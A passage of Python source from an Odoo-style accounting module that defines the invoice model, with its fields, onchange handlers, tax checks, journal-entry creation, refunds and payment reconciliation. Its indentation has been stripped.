" * The 'Cancelled' status is used when user cancel invoice.")
sent = fields.Boolean(readonly=True, default=False, copy=False,
help="It indicates that the invoice has been sent.")
date_invoice = fields.Date(string='Invoice Date',
readonly=True, states={'draft': [('readonly', False)]}, index=True,
help="Keep empty to use the current date", copy=False)
date_due = fields.Date(string='Due Date',
readonly=True, states={'draft': [('readonly', False)]}, index=True, copy=False,
help="If you use payment terms, the due date will be computed automatically at the generation "
"of accounting entries. The payment term may compute several due dates, for example 50% "
"now and 50% in one month, but if you want to force a due date, make sure that the payment "
"term is not set on the invoice. If you keep the payment term and the due date empty, it "
"means direct payment.")
partner_id = fields.Many2one('res.partner', string='Partner', change_default=True,
required=True, readonly=True, states={'draft': [('readonly', False)]},
track_visibility='always')
payment_term = fields.Many2one('account.payment.term', string='Payment Terms',
readonly=True, states={'draft': [('readonly', False)]},
help="If you use payment terms, the due date will be computed automatically at the generation "
"of accounting entries. If you keep the payment term and the due date empty, it means direct payment. "
"The payment term may compute several due dates, for example 50% now, 50% in one month.")
period_id = fields.Many2one('account.period', string='Force Period',
domain=[('state', '!=', 'done')], copy=False,
help="Keep empty to use the period of the validation(invoice) date.",
readonly=True, states={'draft': [('readonly', False)]})
account_id = fields.Many2one('account.account', string='Account',
required=True, readonly=True, states={'draft': [('readonly', False)]},
help="The partner account used for this invoice.")
invoice_line = fields.One2many('account.invoice.line', 'invoice_id', string='Invoice Lines',
readonly=True, states={'draft': [('readonly', False)]}, copy=True)
tax_line = fields.One2many('account.invoice.tax', 'invoice_id', string='Tax Lines',
readonly=True, states={'draft': [('readonly', False)]}, copy=True)
move_id = fields.Many2one('account.move', string='Journal Entry',
readonly=True, index=True, ondelete='restrict', copy=False,
help="Link to the automatically generated Journal Items.")
amount_untaxed = fields.Float(string='Subtotal', digits=dp.get_precision('Account'),
store=True, readonly=True, compute='_compute_amount', track_visibility='always')
amount_tax = fields.Float(string='Tax', digits=dp.get_precision('Account'),
store=True, readonly=True, compute='_compute_amount')
amount_total = fields.Float(string='Total', digits=dp.get_precision('Account'),
store=True, readonly=True, compute='_compute_amount')
currency_id = fields.Many2one('res.currency', string='Currency',
required=True, readonly=True, states={'draft': [('readonly', False)]},
default=_default_currency, track_visibility='always')
journal_id = fields.Many2one('account.journal', string='Journal',
required=True, readonly=True, states={'draft': [('readonly', False)]},
default=_default_journal,
domain="[('type', 'in', {'out_invoice': ['sale'], 'out_refund': ['sale_refund'], 'in_refund': ['purchase_refund'], 'in_invoice': ['purchase']}.get(type, [])), ('company_id', '=', company_id)]")
company_id = fields.Many2one('res.company', string='Company', change_default=True,
required=True, readonly=True, states={'draft': [('readonly', False)]},
default=lambda self: self.env['res.company']._company_default_get('account.invoice'))
check_total = fields.Float(string='Verification Total', digits=dp.get_precision('Account'),
readonly=True, states={'draft': [('readonly', False)]}, default=0.0)
reconciled = fields.Boolean(string='Paid/Reconciled',
store=True, readonly=True, compute='_compute_reconciled',
help="It indicates that the invoice has been paid and the journal entry of the invoice has been reconciled with one or several journal entries of payment.")
partner_bank_id = fields.Many2one('res.partner.bank', string='Bank Account',
help='Bank Account Number to which the invoice will be paid. A Company bank account if this is a Customer Invoice or Supplier Refund, otherwise a Partner bank account number.',
readonly=True, states={'draft': [('readonly', False)]})
move_lines = fields.Many2many('account.move.line', string='Entry Lines',
compute='_compute_move_lines')
residual = fields.Float(string='Balance', digits=dp.get_precision('Account'),
compute='_compute_residual', store=True,
help="Remaining amount due.")
payment_ids = fields.Many2many('account.move.line', string='Payments',
compute='_compute_payments')
move_name = fields.Char(string='Journal Entry', readonly=True,
states={'draft': [('readonly', False)]}, copy=False)
user_id = fields.Many2one('res.users', string='Salesperson', track_visibility='onchange',
readonly=True, states={'draft': [('readonly', False)]},
default=lambda self: self.env.user)
fiscal_position = fields.Many2one('account.fiscal.position', string='Fiscal Position',
readonly=True, states={'draft': [('readonly', False)]})
commercial_partner_id = fields.Many2one('res.partner', string='Commercial Entity',
related='partner_id.commercial_partner_id', store=True, readonly=True,
help="The commercial entity that will be used on Journal Entries for this invoice")
_sql_constraints = [
('number_uniq', 'unique(number, company_id, journal_id, type)',
'Invoice Number must be unique per Company!'),
]
@api.model
def fields_view_get(self, view_id=None, view_type=False, toolbar=False, submenu=False):
context = self._context
def get_view_id(xid, name):
try:
return self.env['ir.model.data'].xmlid_to_res_id('account.' + xid, raise_if_not_found=True)
except ValueError:
try:
return self.env['ir.ui.view'].search([('name', '=', name)], limit=1).id
except Exception:
return False # view not found
if context.get('active_model') == 'res.partner' and context.get('active_ids'):
partner = self.env['res.partner'].browse(context['active_ids'])[0]
if not view_type:
view_id = get_view_id('invoice_tree', 'account.invoice.tree')
view_type = 'tree'
elif view_type == 'form':
if partner.supplier and not partner.customer:
view_id = get_view_id('invoice_supplier_form', 'account.invoice.supplier.form')
elif partner.customer and not partner.supplier:
view_id = get_view_id('invoice_form', 'account.invoice.form')
res = super(account_invoice, self).fields_view_get(view_id=view_id, view_type=view_type, toolbar=toolbar, submenu=submenu)
# adapt selection of field journal_id
for field in res['fields']:
if field == 'journal_id' and type:
journal_select = self.env['account.journal']._name_search('', [('type', '=', type)], name_get_uid=1)
res['fields'][field]['selection'] = journal_select
doc = etree.XML(res['arch'])
if context.get('type'):
for node in doc.xpath("//field[@name='partner_bank_id']"):
if context['type'] == 'in_refund':
node.set('domain', "[('partner_id.ref_companies', 'in', [company_id])]")
elif context['type'] == 'out_refund':
node.set('domain', "[('partner_id', '=', partner_id)]")
if view_type == 'search':
if context.get('type') in ('out_invoice', 'out_refund'):
for node in doc.xpath("//group[@name='extended filter']"):
doc.remove(node)
if view_type == 'tree':
partner_string = _('Customer')
if context.get('type') in ('in_invoice', 'in_refund'):
partner_string = _('Supplier')
for node in doc.xpath("//field[@name='reference']"):
node.set('invisible', '0')
for node in doc.xpath("//field[@name='partner_id']"):
node.set('string', partner_string)
res['arch'] = etree.tostring(doc)
return res
@api.multi
def invoice_print(self):
""" Print the invoice and mark it as sent, so that we can see more
easily the next step of the workflow
"""
assert len(self) == 1, 'This option should only be used for a single id at a time.'
self.sent = True
return self.env['report'].get_action(self, 'account.report_invoice')
@api.multi
def action_invoice_sent(self):
""" Open a window to compose an email, with the edi invoice template
message loaded by default
"""
assert len(self) == 1, 'This option should only be used for a single id at a time.'
template = self.env.ref('account.email_template_edi_invoice', False)
compose_form = self.env.ref('mail.email_compose_message_wizard_form', False)
ctx = dict(
default_model='account.invoice',
default_res_id=self.id,
default_use_template=bool(template),
default_template_id=template.id,
default_composition_mode='comment',
mark_invoice_as_sent=True,
)
return {
'name': _('Compose Email'),
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'views': [(compose_form.id, 'form')],
'view_id': compose_form.id,
'target': 'new',
'context': ctx,
}
@api.multi
def confirm_paid(self):
return self.write({'state': 'paid'})
@api.multi
def unlink(self):
for invoice in self:
if invoice.state not in ('draft', 'cancel'):
raise Warning(_('You cannot delete an invoice which is not draft or cancelled. You should refund it instead.'))
elif invoice.internal_number:
raise Warning(_('You cannot delete an invoice after it has been validated (and received a number). You can set it back to "Draft" state and modify its content, then re-confirm it.'))
return super(account_invoice, self).unlink()
@api.multi
def onchange_partner_id(self, type, partner_id, date_invoice=False,
payment_term=False, partner_bank_id=False, company_id=False):
account_id = False
payment_term_id = False
fiscal_position = False
bank_id = False
if partner_id:
p = self.env['res.partner'].browse(partner_id)
rec_account = p.property_account_receivable
pay_account = p.property_account_payable
if company_id:
if p.property_account_receivable.company_id and \
p.property_account_receivable.company_id.id != company_id and \
p.property_account_payable.company_id and \
p.property_account_payable.company_id.id != company_id:
prop = self.env['ir.property']
rec_dom = [('name', '=', 'property_account_receivable'), ('company_id', '=', company_id)]
pay_dom = [('name', '=', 'property_account_payable'), ('company_id', '=', company_id)]
res_dom = [('res_id', '=', 'res.partner,%s' % partner_id)]
rec_prop = prop.search(rec_dom + res_dom) or prop.search(rec_dom)
pay_prop = prop.search(pay_dom + res_dom) or prop.search(pay_dom)
rec_account = rec_prop.get_by_record(rec_prop)
pay_account = pay_prop.get_by_record(pay_prop)
if not rec_account and not pay_account:
action = self.env.ref('account.action_account_config')
msg = _('Cannot find a chart of accounts for this company, You should configure it. \nPlease go to Account Configuration.')
raise RedirectWarning(msg, action.id, _('Go to the configuration panel'))
if type in ('out_invoice', 'out_refund'):
account_id = rec_account.id
payment_term_id = p.property_payment_term.id
else:
account_id = pay_account.id
payment_term_id = p.property_supplier_payment_term.id
fiscal_position = p.property_account_position.id
bank_id = p.bank_ids and p.bank_ids[0].id or False
result = {'value': {
'account_id': account_id,
'payment_term': payment_term_id,
'fiscal_position': fiscal_position,
}}
if type in ('in_invoice', 'in_refund'):
result['value']['partner_bank_id'] = bank_id
if payment_term != payment_term_id:
if payment_term_id:
to_update = self.onchange_payment_term_date_invoice(payment_term_id, date_invoice)
result['value'].update(to_update.get('value', {}))
else:
result['value']['date_due'] = False
if partner_bank_id != bank_id:
to_update = self.onchange_partner_bank(bank_id)
result['value'].update(to_update.get('value', {}))
return result
@api.multi
def onchange_journal_id(self, journal_id=False):
if journal_id:
journal = self.env['account.journal'].browse(journal_id)
return {
'value': {
'currency_id': journal.currency.id or journal.company_id.currency_id.id,
'company_id': journal.company_id.id,
}
}
return {}
@api.multi
def onchange_payment_term_date_invoice(self, payment_term_id, date_invoice):
if not date_invoice:
date_invoice = fields.Date.context_today(self)
if not payment_term_id:
# To make sure the invoice due date should contain due date which is
# entered by user when there is no payment term defined
return {'value': {'date_due': self.date_due or date_invoice}}
pterm = self.env['account.payment.term'].browse(payment_term_id)
pterm_list = pterm.compute(value=1, date_ref=date_invoice)[0]
if pterm_list:
return {'value': {'date_due': max(line[0] for line in pterm_list)}}
else:
raise except_orm(_('Insufficient Data!'),
_('The payment term of supplier does not have a payment term line.'))
@api.multi
def onchange_invoice_line(self, lines):
return {}
@api.multi
def onchange_partner_bank(self, partner_bank_id=False):
return {'value': {}}
@api.multi
def onchange_company_id(self, company_id, part_id, type, invoice_line, currency_id):
# TODO: add the missing context parameter when forward-porting in trunk
# so we can remove this hack!
self = self.with_context(self.env['res.users'].context_get())
values = {}
domain = {}
if company_id and part_id and type:
p = self.env['res.partner'].browse(part_id)
if p.property_account_payable and p.property_account_receivable and \
p.property_account_payable.company_id.id != company_id and \
p.property_account_receivable.company_id.id != company_id:
prop = self.env['ir.property']
rec_dom = [('name', '=', 'property_account_receivable'), ('company_id', '=', company_id)]
pay_dom = [('name', '=', 'property_account_payable'), ('company_id', '=', company_id)]
res_dom = [('res_id', '=', 'res.partner,%s' % part_id)]
rec_prop = prop.search(rec_dom + res_dom) or prop.search(rec_dom)
pay_prop = prop.search(pay_dom + res_dom) or prop.search(pay_dom)
rec_account = rec_prop.get_by_record(rec_prop)
pay_account = pay_prop.get_by_record(pay_prop)
if not rec_account and not pay_account:
action = self.env.ref('account.action_account_config')
msg = _('Cannot find a chart of accounts for this company, You should configure it. \nPlease go to Account Configuration.')
raise RedirectWarning(msg, action.id, _('Go to the configuration panel'))
if type in ('out_invoice', 'out_refund'):
acc_id = rec_account.id
else:
acc_id = pay_account.id
values= {'account_id': acc_id}
if self:
if company_id:
for line in self.invoice_line:
if not line.account_id:
continue
if line.account_id.company_id.id == company_id:
continue
accounts = self.env['account.account'].search([('name', '=', line.account_id.name), ('company_id', '=', company_id)])
if not accounts:
action = self.env.ref('account.action_account_config')
msg = _('Cannot find a chart of accounts for this company, You should configure it. \nPlease go to Account Configuration.')
raise RedirectWarning(msg, action.id, _('Go to the configuration panel'))
line.write({'account_id': accounts[-1].id})
else:
for line_cmd in invoice_line or []:
if len(line_cmd) >= 3 and isinstance(line_cmd[2], dict):
line = self.env['account.account'].browse(line_cmd[2]['account_id'])
if line.company_id.id != company_id:
raise except_orm(
_('Configuration Error!'),
_("Invoice line account's company and invoice's company does not match.")
)
if company_id and type:
journal_type = TYPE2JOURNAL[type]
journals = self.env['account.journal'].search([('type', '=', journal_type), ('company_id', '=', company_id)])
if journals:
values['journal_id'] = journals[0].id
journal_defaults = self.env['ir.values'].get_defaults_dict('account.invoice', 'type=%s' % type)
if 'journal_id' in journal_defaults:
values['journal_id'] = journal_defaults['journal_id']
if not values.get('journal_id'):
field_desc = journals.fields_get(['type'])
type_label = next(t for t, label in field_desc['type']['selection'] if t == journal_type)
action = self.env.ref('account.action_account_journal_form')
msg = _('Cannot find any account journal of type "%s" for this company, You should create one.\n Please go to Journal Configuration') % type_label
raise RedirectWarning(msg, action.id, _('Go to the configuration panel'))
domain = {'journal_id': [('id', 'in', journals.ids)]}
return {'value': values, 'domain': domain}
@api.multi
def action_cancel_draft(self):
# go from canceled state to draft state
self.write({'state': 'draft'})
self.delete_workflow()
self.create_workflow()
return True
@api.one
@api.returns('ir.ui.view')
def get_formview_id(self):
""" Update form view id of action to open the invoice """
if self.type == 'in_invoice':
return self.env.ref('account.invoice_supplier_form')
else:
return self.env.ref('account.invoice_form')
@api.multi
def move_line_id_payment_get(self):
# return the move line ids with the same account as the invoice self
if not self.id:
return []
query = """ SELECT l.id
FROM account_move_line l, account_invoice i
WHERE i.id = %s AND l.move_id = i.move_id AND l.account_id = i.account_id
"""
self._cr.execute(query, (self.id,))
return [row[0] for row in self._cr.fetchall()]
@api.multi
def test_paid(self):
# check whether all corresponding account move lines are reconciled
line_ids = self.move_line_id_payment_get()
if not line_ids:
return False
query = "SELECT reconcile_id FROM account_move_line WHERE id IN %s"
self._cr.execute(query, (tuple(line_ids),))
return all(row[0] for row in self._cr.fetchall())
@api.multi
def button_reset_taxes(self):
account_invoice_tax = self.env['account.invoice.tax']
ctx = dict(self._context)
for invoice in self:
self._cr.execute("DELETE FROM account_invoice_tax WHERE invoice_id=%s AND manual is False", (invoice.id,))
self.invalidate_cache()
partner = invoice.partner_id
if partner.lang:
ctx['lang'] = partner.lang
for taxe in account_invoice_tax.compute(invoice.with_context(ctx)).values():
account_invoice_tax.create(taxe)
# dummy write on self to trigger recomputations
return self.with_context(ctx).write({'invoice_line': []})
@api.multi
def button_compute(self, set_total=False):
self.button_reset_taxes()
for invoice in self:
if set_total:
invoice.check_total = invoice.amount_total
return True
@api.multi
def _get_analytic_lines(self):
""" Return a list of dict for creating analytic lines for self[0] """
company_currency = self.company_id.currency_id
sign = 1 if self.type in ('out_invoice', 'in_refund') else -1
iml = self.env['account.invoice.line'].move_line_get(self.id)
for il in iml:
if il['account_analytic_id']:
if self.type in ('in_invoice', 'in_refund'):
ref = self.reference
else:
ref = self.number
if not self.journal_id.analytic_journal_id:
raise except_orm(_('No Analytic Journal!'),
_("You have to define an analytic journal on the '%s' journal!") % (self.journal_id.name,))
currency = self.currency_id.with_context(date=self.date_invoice)
il['analytic_lines'] = [(0,0, {
'name': il['name'],
'date': self.date_invoice,
'account_id': il['account_analytic_id'],
'unit_amount': il['quantity'],
'amount': currency.compute(il['price'], company_currency) * sign,
'product_id': il['product_id'],
'product_uom_id': il['uos_id'],
'general_account_id': il['account_id'],
'journal_id': self.journal_id.analytic_journal_id.id,
'ref': ref,
})]
return iml
@api.multi
def action_date_assign(self):
for inv in self:
res = inv.onchange_payment_term_date_invoice(inv.payment_term.id, inv.date_invoice)
if res and res.get('value'):
inv.write(res['value'])
return True
@api.multi
def finalize_invoice_move_lines(self, move_lines):
""" finalize_invoice_move_lines(move_lines) -> move_lines
Hook method to be overridden in additional modules to verify and
possibly alter the move lines to be created by an invoice, for
special cases.
:param move_lines: list of dictionaries with the account.move.lines (as for create())
:return: the (possibly updated) final move_lines to create for this invoice
"""
return move_lines
@api.multi
def check_tax_lines(self, compute_taxes):
account_invoice_tax = self.env['account.invoice.tax']
company_currency = self.company_id.currency_id
if not self.tax_line:
for tax in compute_taxes.values():
account_invoice_tax.create(tax)
else:
tax_key = []
precision = self.env['decimal.precision'].precision_get('Account')
for tax in self.tax_line:
if tax.manual:
continue
key = (tax.tax_code_id.id, tax.base_code_id.id, tax.account_id.id)
tax_key.append(key)
if key not in compute_taxes:
raise except_orm(_('Warning!'), _('Global taxes defined, but they are not in invoice lines !'))
base = compute_taxes[key]['base']
if float_compare(abs(base - tax.base), company_currency.rounding, precision_digits=precision) == 1:
raise except_orm(_('Warning!'), _('Tax base different!\nClick on compute to update the tax base.'))
for key in compute_taxes:
if key not in tax_key:
raise except_orm(_('Warning!'), _('Taxes are missing!\nClick on compute button.'))
@api.multi
def compute_invoice_totals(self, company_currency, ref, invoice_move_lines):
total = 0
total_currency = 0
for line in invoice_move_lines:
if self.currency_id != company_currency:
currency = self.currency_id.with_context(date=self.date_invoice or fields.Date.context_today(self))
line['currency_id'] = currency.id
line['amount_currency'] = line['price']
line['price'] = currency.compute(line['price'], company_currency)
else:
line['currency_id'] = False
line['amount_currency'] = False
line['ref'] = ref
if self.type in ('out_invoice','in_refund'):
total += line['price']
total_currency += line['amount_currency'] or line['price']
line['price'] = - line['price']
else:
total -= line['price']
total_currency -= line['amount_currency'] or line['price']
return total, total_currency, invoice_move_lines
def inv_line_characteristic_hashcode(self, invoice_line):
"""Overridable hashcode generation for invoice lines. Lines having the same hashcode
will be grouped together if the journal has the 'group line' option. Of course a module
can add fields to invoice lines that would need to be tested too before merging lines
or not."""
return "%s-%s-%s-%s-%s" % (
invoice_line['account_id'],
invoice_line.get('tax_code_id', 'False'),
invoice_line.get('product_id', 'False'),
invoice_line.get('analytic_account_id', 'False'),
invoice_line.get('date_maturity', 'False'),
)
def group_lines(self, iml, line):
"""Merge account move lines (and hence analytic lines) if invoice line hashcodes are equals"""
if self.journal_id.group_invoice_lines:
line2 = {}
for x, y, l in line:
tmp = self.inv_line_characteristic_hashcode(l)
if tmp in line2:
am = line2[tmp]['debit'] - line2[tmp]['credit'] + (l['debit'] - l['credit'])
line2[tmp]['debit'] = (am > 0) and am or 0.0
line2[tmp]['credit'] = (am < 0) and -am or 0.0
line2[tmp]['tax_amount'] += l['tax_amount']
line2[tmp]['analytic_lines'] += l['analytic_lines']
else:
line2[tmp] = l
line = []
for key, val in line2.items():
line.append((0,0,val))
return line
@api.multi
def action_move_create(self):
""" Creates invoice related analytics and financial move lines """
account_invoice_tax = self.env['account.invoice.tax']
account_move = self.env['account.move']
for inv in self:
if not inv.journal_id.sequence_id:
raise except_orm(_('Error!'), _('Please define sequence on the journal related to this invoice.'))
if not inv.invoice_line:
raise except_orm(_('No Invoice Lines!'), _('Please create some invoice lines.'))
if inv.move_id:
continue
ctx = dict(self._context, lang=inv.partner_id.lang)
if not inv.date_invoice:
inv.with_context(ctx).write({'date_invoice': fields.Date.context_today(self)})
date_invoice = inv.date_invoice
company_currency = inv.company_id.currency_id
# create the analytical lines, one move line per invoice line
iml = inv._get_analytic_lines()
# check if taxes are all computed
compute_taxes = account_invoice_tax.compute(inv.with_context(lang=inv.partner_id.lang))
inv.check_tax_lines(compute_taxes)
# I disabled the check_total feature
if self.env['res.users'].has_group('account.group_supplier_inv_check_total'):
if inv.type in ('in_invoice', 'in_refund') and abs(inv.check_total - inv.amount_total) >= (inv.currency_id.rounding / 2.0):
raise except_orm(_('Bad Total!'), _('Please verify the price of the invoice!\nThe encoded total does not match the computed total.'))
if inv.payment_term:
total_fixed = total_percent = 0
for line in inv.payment_term.line_ids:
if line.value == 'fixed':
total_fixed += line.value_amount
if line.value == 'procent':
total_percent += line.value_amount
total_fixed = (total_fixed * 100) / (inv.amount_total or 1.0)
if (total_fixed + total_percent) > 100:
raise except_orm(_('Error!'), _("Cannot create the invoice.\nThe related payment term is probably misconfigured as it gives a computed amount greater than the total invoiced amount. In order to avoid rounding issues, the latest line of your payment term must be of type 'balance'."))
# one move line per tax line
iml += account_invoice_tax.move_line_get(inv.id)
if inv.type in ('in_invoice', 'in_refund'):
ref = inv.reference
else:
ref = inv.number
diff_currency = inv.currency_id != company_currency
# create one move line for the total and possibly adjust the other lines amount
total, total_currency, iml = inv.with_context(ctx).compute_invoice_totals(company_currency, ref, iml)
name = inv.supplier_invoice_number or inv.name or '/'
totlines = []
if inv.payment_term:
totlines = inv.with_context(ctx).payment_term.compute(total, date_invoice)[0]
if totlines:
res_amount_currency = total_currency
ctx['date'] = date_invoice
for i, t in enumerate(totlines):
if inv.currency_id != company_currency:
amount_currency = company_currency.with_context(ctx).compute(t[1], inv.currency_id)
else:
amount_currency = False
# last line: add the diff
res_amount_currency -= amount_currency or 0
if i + 1 == len(totlines):
amount_currency += res_amount_currency
iml.append({
'type': 'dest',
'name': name,
'price': t[1],
'account_id': inv.account_id.id,
'date_maturity': t[0],
'amount_currency': diff_currency and amount_currency,
'currency_id': diff_currency and inv.currency_id.id,
'ref': ref,
})
else:
iml.append({
'type': 'dest',
'name': name,
'price': total,
'account_id': inv.account_id.id,
'date_maturity': inv.date_due,
'amount_currency': diff_currency and total_currency,
'currency_id': diff_currency and inv.currency_id.id,
'ref': ref
})
date = date_invoice
part = self.env['res.partner']._find_accounting_partner(inv.partner_id)
line = [(0, 0, self.line_get_convert(l, part.id, date)) for l in iml]
line = inv.group_lines(iml, line)
journal = inv.journal_id.with_context(ctx)
if journal.centralisation:
raise except_orm(_('User Error!'),
_('You cannot create an invoice on a centralized journal. Uncheck the centralized counterpart box in the related journal from the configuration menu.'))
line = inv.finalize_invoice_move_lines(line)
move_vals = {
'ref': inv.reference or inv.name,
'line_id': line,
'journal_id': journal.id,
'date': inv.date_invoice,
'narration': inv.comment,
'company_id': inv.company_id.id,
}
ctx['company_id'] = inv.company_id.id
period = inv.period_id
if not period:
period = period.with_context(ctx).find(date_invoice)[:1]
if period:
move_vals['period_id'] = period.id
for i in line:
i[2]['period_id'] = period.id
ctx['invoice'] = inv
move = account_move.with_context(ctx).create(move_vals)
# make the invoice point to that move
vals = {
'move_id': move.id,
'period_id': period.id,
'move_name': move.name,
}
inv.with_context(ctx).write(vals)
# Pass invoice in context in method post: used if you want to get the same
# account move reference when creating the same invoice after a cancelled one:
move.post()
self._log_event()
return True
@api.multi
def invoice_validate(self):
return self.write({'state': 'open'})
@api.model
def line_get_convert(self, line, part, date):
return {
'date_maturity': line.get('date_maturity', False),
'partner_id': part,
'name': line['name'][:64],
'date': date,
'debit': line['price']>0 and line['price'],
'credit': line['price']<0 and -line['price'],
'account_id': line['account_id'],
'analytic_lines': line.get('analytic_lines', []),
'amount_currency': line['price']>0 and abs(line.get('amount_currency', False)) or -abs(line.get('amount_currency', False)),
'currency_id': line.get('currency_id', False),
'tax_code_id': line.get('tax_code_id', False),
'tax_amount': line.get('tax_amount', False),
'ref': line.get('ref', False),
'quantity': line.get('quantity',1.00),
'product_id': line.get('product_id', False),
'product_uom_id': line.get('uos_id', False),
'analytic_account_id': line.get('account_analytic_id', False),
}
@api.multi
def action_number(self):
#TODO: not correct fix but required a fresh values before reading it.
self.write({})
for inv in self:
self.write({'internal_number': inv.number})
if inv.type in ('in_invoice', 'in_refund'):
if not inv.reference:
ref = inv.number
else:
ref = inv.reference
else:
ref = inv.number
self._cr.execute(""" UPDATE account_move SET ref=%s
WHERE id=%s AND (ref IS NULL OR ref = '')""",
(ref, inv.move_id.id))
self._cr.execute(""" UPDATE account_move_line SET ref=%s
WHERE move_id=%s AND (ref IS NULL OR ref = '')""",
(ref, inv.move_id.id))
self._cr.execute(""" UPDATE account_analytic_line SET ref=%s
FROM account_move_line
WHERE account_move_line.move_id = %s AND
account_analytic_line.move_id = account_move_line.id""",
(ref, inv.move_id.id))
self.invalidate_cache()
return True
@api.multi
def action_cancel(self):
moves = self.env['account.move']
for inv in self:
if inv.move_id:
moves += inv.move_id
if inv.payment_ids:
for move_line in inv.payment_ids:
if move_line.reconcile_partial_id.line_partial_ids:
raise except_orm(_('Error!'), _('You cannot cancel an invoice which is partially paid. You need to unreconcile related payment entries first.'))
# First, set the invoices as cancelled and detach the move ids
self.write({'state': 'cancel', 'move_id': False})
if moves:
# second, invalidate the move(s)
moves.button_cancel()
# delete the move this invoice was pointing to
# Note that the corresponding move_lines and move_reconciles
# will be automatically deleted too
moves.unlink()
self._log_event(-1.0, 'Cancel Invoice')
return True
###################
@api.multi
def _log_event(self, factor=1.0, name='Open Invoice'):
#TODO: implement messages system
return True
@api.multi
def name_get(self):
TYPES = {
'out_invoice': _('Invoice'),
'in_invoice': _('Supplier Invoice'),
'out_refund': _('Refund'),
'in_refund': _('Supplier Refund'),
}
result = []
for inv in self:
result.append((inv.id, "%s %s" % (inv.number or TYPES[inv.type], inv.name or '')))
return result
@api.model
def name_search(self, name, args=None, operator='ilike', limit=100):
args = args or []
recs = self.browse()
if name:
recs = self.search([('number', '=', name)] + args, limit=limit)
if not recs:
recs = self.search([('name', operator, name)] + args, limit=limit)
return recs.name_get()
@api.model
def _refund_cleanup_lines(self, lines):
""" Convert records to dict of values suitable for one2many line creation
:param recordset lines: records to convert
:return: list of command tuple for one2many line creation [(0, 0, dict of valueis), ...]
"""
result = []
for line in lines:
values = {}
for name, field in line._fields.iteritems():
if name in MAGIC_COLUMNS:
continue
elif field.type == 'many2one':
values[name] = line[name].id
elif field.type not in ['many2many', 'one2many']:
values[name] = line[name]
elif name == 'invoice_line_tax_id':
values[name] = [(6, 0, line[name].ids)]
result.append((0, 0, values))
return result
@api.model
def _prepare_refund(self, invoice, date=None, period_id=None, description=None, journal_id=None):
""" Prepare the dict of values to create the new refund from the invoice.
This method may be overridden to implement custom
refund generation (making sure to call super() to establish
a clean extension chain).
:param record invoice: invoice to refund
:param string date: refund creation date from the wizard
:param integer period_id: force account.period from the wizard
:param string description: description of the refund from the wizard
:param integer journal_id: account.journal from the wizard
:return: dict of value to create() the refund
"""
values = {}
for field in ['name', 'reference', 'comment', 'date_due', 'partner_id', 'company_id',
'account_id', 'currency_id', 'payment_term', 'user_id', 'fiscal_position']:
if invoice._fields[field].type == 'many2one':
values[field] = invoice[field].id
else:
values[field] = invoice[field] or False
values['invoice_line'] = self._refund_cleanup_lines(invoice.invoice_line)
tax_lines = filter(lambda l: l.manual, invoice.tax_line)
values['tax_line'] = self._refund_cleanup_lines(tax_lines)
if journal_id:
journal = self.env['account.journal'].browse(journal_id)
elif invoice['type'] == 'in_invoice':
journal = self.env['account.journal'].search([('type', '=', 'purchase_refund')], limit=1)
else:
journal = self.env['account.journal'].search([('type', '=', 'sale_refund')], limit=1)
values['journal_id'] = journal.id
values['type'] = TYPE2REFUND[invoice['type']]
values['date_invoice'] = date or fields.Date.context_today(invoice)
values['state'] = 'draft'
values['number'] = False
values['origin'] = invoice.number
if period_id:
values['period_id'] = period_id
if description:
values['name'] = description
return values
@api.multi
@api.returns('self')
def refund(self, date=None, period_id=None, description=None, journal_id=None):
new_invoices = self.browse()
for invoice in self:
# create the new invoice
values = self._prepare_refund(invoice, date=date, period_id=period_id,
description=description, journal_id=journal_id)
new_invoices += self.create(values)
return new_invoices
@api.v8
def pay_and_reconcile(self, pay_amount, pay_account_id, period_id, pay_journal_id,
writeoff_acc_id, writeoff_period_id, writeoff_journal_id, name=''):
# TODO check if we can use different period for payment and the writeoff line
assert len(self)==1, "Can only pay one invoice at a time."
# Take the seq as name for move
SIGN = {'out_invoice': -1, 'in_invoice': 1, 'out_refund': 1, 'in_refund': -1}
direction = SIGN[self.type]
# take the chosen date
date = self._context.get('date_p') or fields.Date.context_today(self)
# Take the amount in currency and the currency of the payment
if self._context.get('amount_currency') and self._context.get('currency_id'):
amount_currency = self._context['amount_currency']
currency_id = self._context['currency_id']
else:
amount_currency = False
currency_id = False
pay_journal = self.env['account.journal'].browse(pay_journal_id)
if self.type in ('in_invoice', 'in_refund'):
ref = self.reference
else:
ref = self.number
partner = self.partner_id._find_accounting_partner(self.partner_id)
name = name or self.invoice_line[0].name or self.number
# Pay attention to the sign for both debit/credit AND amount_currency
l1 = {
'name': name,
'debit': direction * pay_amount > 0 and direction * pay_amount,
'credit': direction * pay_amount < 0 and -direction * pay_amount,
'account_id': self.account_id.id,
'partner_id': partner.id,
'ref': ref,
'date': date,
'currency_id': currency_id,
'amount_currency': direction * (amount_currency or 0.0),
'company_id': self.company_id.id,
}
l2 = {
'name': name,
'debit': direction * pay_amount < 0 and -direction * pay_amount,
'credit': direction * pay_amount > 0 and direction * pay_amount,
'account_id': pay_account_id,
'partner_id': partner.id,
'ref': ref,
'date': date,
'currency_id': currency_id,
'amount_currency': -direction * (amount_currency or 0.0),
'company_id': self.company_id.id,
}
move = self.env['account.move'].create({
'ref': ref,
'line_id': [(0, 0, l1), (0, 0, l2)],
'journal_id': pay_journal_id,
'period_id': period_id,
'date': date,
})
move_ids = (move | self.move_id).ids
self._cr.execute("SELECT id FROM account_move_line WHERE move_id IN %s",
(tuple(move_ids),))
lines = self.env['account.move.line'].browse([r[0] for r in self._cr.fetchall()])
lines2rec = lines.browse()
total = 0.0
for line in itertools.chain(lines, self.payment_ids):
if line.account_id == self.account_id:
lines2rec += line
total += (line.debit or 0.0) - (line.credit or 0.0)
inv_id, name = self.name_get()[0]
if not round(total, self.env['decimal.precision'].precision_get('Account')) or writeoff_acc_id:
lines2rec.reconcile('manual', writeoff_acc_id, writeoff_period_id, writeoff_journal_id)
else:
code = self.currency_id.symbol
# TODO: use currency's formatting function
msg = _("Invoice partially paid: %s%s of %s%s (%s%s remaining).") % \
(pay_amount, code, self.amount_total, code, total, code)
self.message_post(body=msg)
lines2rec.reconcile_partial('manual')
# Update the stored value (fields.function), so we write to trigger recompute
return self.write({})
@api.v7
def pay_and_reconcile(self, cr, uid, ids, pay_amount, pay_account_id, period_id, pay_journal_id,
writeoff_acc_id, writeoff_period_id, writeoff_journal_id, context=None, name=''):
recs = self.browse(cr, uid, ids, context)
return recs.pay_and_reconcile(pay_amount, pay_account_id, period_id, pay_journal_id,
